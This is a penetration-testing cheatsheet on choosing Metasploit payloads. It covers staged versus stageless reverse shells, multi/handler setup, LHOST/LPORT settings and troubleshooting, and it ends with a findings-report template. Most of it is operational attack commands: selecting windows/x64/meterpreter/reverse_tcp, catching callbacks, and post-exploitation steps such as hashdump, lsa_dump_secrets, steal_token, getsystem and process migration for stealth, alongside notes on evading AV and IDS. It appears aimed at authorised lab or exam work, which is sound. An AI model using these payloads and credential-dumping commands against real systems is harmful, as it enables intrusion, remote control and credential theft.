🛡️ Methodology Checklist
- List payloads for target arch/OS:
msfvenom --list payloads | grep [OS] - Staged vs stageless: staged (
/tcp) requires listener; stageless (/tcp_shell) is self-contained - Choose payload:
windows/x64/meterpreter/reverse_tcpfor modern Windows - Set LHOST/LPORT to match handler
- Start handler:
use exploit/multi/handler→ set payload, LHOST, LPORT →run -j - Deliver payload and wait for callback
- Verify session established before proceeding
🎯 Operational Context
Use when: Selecting the right MSF payload type before generating or deploying — understand staged vs stageless, singles, and platform differences. Think Dumber First: Staged = smaller initial shellcode + stage 2 download (needs reliable network). Stageless = self-contained but larger. For unstable networks or restricted egress, always use stageless. Port 443 always preferred over 4444. Skip when: Non-MSF delivery required — use msfvenom standalone instead of MSF handler.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
grep meterpreter grep reverse_tcp show payloads | Filter payloads by chained grep |
set payload windows/x64/meterpreter/reverse_tcp | Set staged Meterpreter payload |
set payload windows/x64/shell_reverse_tcp | Set stageless CMD shell payload |
set payload 15 | Set payload by index number |
show payloads | List all payloads compatible with current module |
set LHOST tun0 | Set local host (always use tun0 on VPN) |
set LPORT 4444 | Set local listener port |
ifconfig | Check your IP inside msfconsole |
run | Execute exploit with selected payload |
getuid | Meterpreter: show current user (equiv to whoami) |
sysinfo | Meterpreter: system details (OS, arch) |
hashdump | Meterpreter: dump SAM database NTLM hashes |
background | Background active Meterpreter session |
shell | Drop from Meterpreter into system CMD/Bash |
🔬 Deep Dive & Workflow
Singles vs Staged — The Critical Distinction
| Singles (Inline) | Staged (Stager + Stage) | |
|---|---|---|
| Naming | Underscores: shell_reverse_tcp | Slashes: shell/reverse_tcp |
| Delivery | Exploit + shellcode in one packet | Tiny stager, then downloads stage |
| Size | Larger | Compact stager |
| Stability | More stable (no second network step) | Needs stable connection for stage download |
| Example | windows/x64/shell_reverse_tcp | windows/x64/shell/reverse_tcp |
| AV | Entire payload hits disk at once | Stage downloads into memory |
Read the naming: windows/x64/meterpreter/reverse_tcp = “download Meterpreter stage via reverse_tcp” (staged). windows/x64/meterpreter_reverse_tcp = all-in-one (stageless).
Meterpreter — What Makes It Different
- In-memory DLL injection — no binary written to disk
- AES-encrypted channel — hides traffic content from network IDS
- Extensible — loads extensions (Mimikatz, incognito) over the wire at runtime
- Unix-style navigation on Windows (
ls,cd,pwd) - Persistence — harder to detect than CMD shell
Key Meterpreter commands:
getuid → whoami equivalent
sysinfo → OS, hostname, arch
hashdump → dump SAM hashes (needs SYSTEM)
lsa_dump_secrets → dump LSA secrets and cached creds
migrate <PID> → move to another process (stability/stealth)
steal_token <PID> → impersonate another process's token
getsystem → auto-escalate to SYSTEM
upload / download → file transfer
portfwd / route → pivoting
Common Windows Payload Reference
| Payload | Type | Use Case |
|---|---|---|
windows/x64/shell_reverse_tcp | Single | Quiet, no Meterpreter needed |
windows/x64/shell/reverse_tcp | Staged | When buffer space is limited |
windows/x64/meterpreter/reverse_tcp | Staged | Full post-ex capability |
windows/x64/exec | Single | Run one command |
windows/x64/vncinject/reverse_tcp | Staged | GUI remote desktop |
LHOST Trap — Most Common Failure
If LHOST is set to your LAN IP instead of the VPN IP (tun0), the staged payload’s stager will run but the stage download will fail — you get a hanging session with no Meterpreter.
# Always verify
ifconfig
set LHOST tun0 # not 192.168.x.xArchitecture Mismatch
x64 payload on x86 target → process crash. Always confirm arch from nmap scan (OS CPE) before selecting payload.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Payload fails silently | Stage 2 download blocked by firewall | Switch to stageless: change meterpreter/reverse_tcp to meterpreter_reverse_tcp |
| Wrong architecture payload sent | Auto-select chose x86 on x64 target | Explicitly set PAYLOAD to windows/x64/... after checking systeminfo |
| Handler shows connection but no session | Stage 2 rejected | Confirm handler PAYLOAD matches what was generated; both must be identical |
| Payload exits after short time | Session timeout | Set set SessionExpirationTimeout 0 in handler before exploit |
| Multi/handler not catching connection | Wrong LHOST | Set LHOST to VPN interface IP (tun0/ppp0) not LAN IP: ip addr show tun0 |
📝 Reporting Trigger
Finding Title: MSF Staged/Stageless Payload Achieves Remote Session Impact: Correct payload selection based on network conditions ensures reliable session establishment, providing post-exploitation capability including lateral movement and credential access. Root Cause: Vulnerable service running with insufficient network egress restrictions. No payload delivery detection at network or endpoint layer. Recommendation: Implement egress filtering to block outbound connections on non-business ports. Deploy EDR with shellcode execution detection. Patch vulnerable service immediately.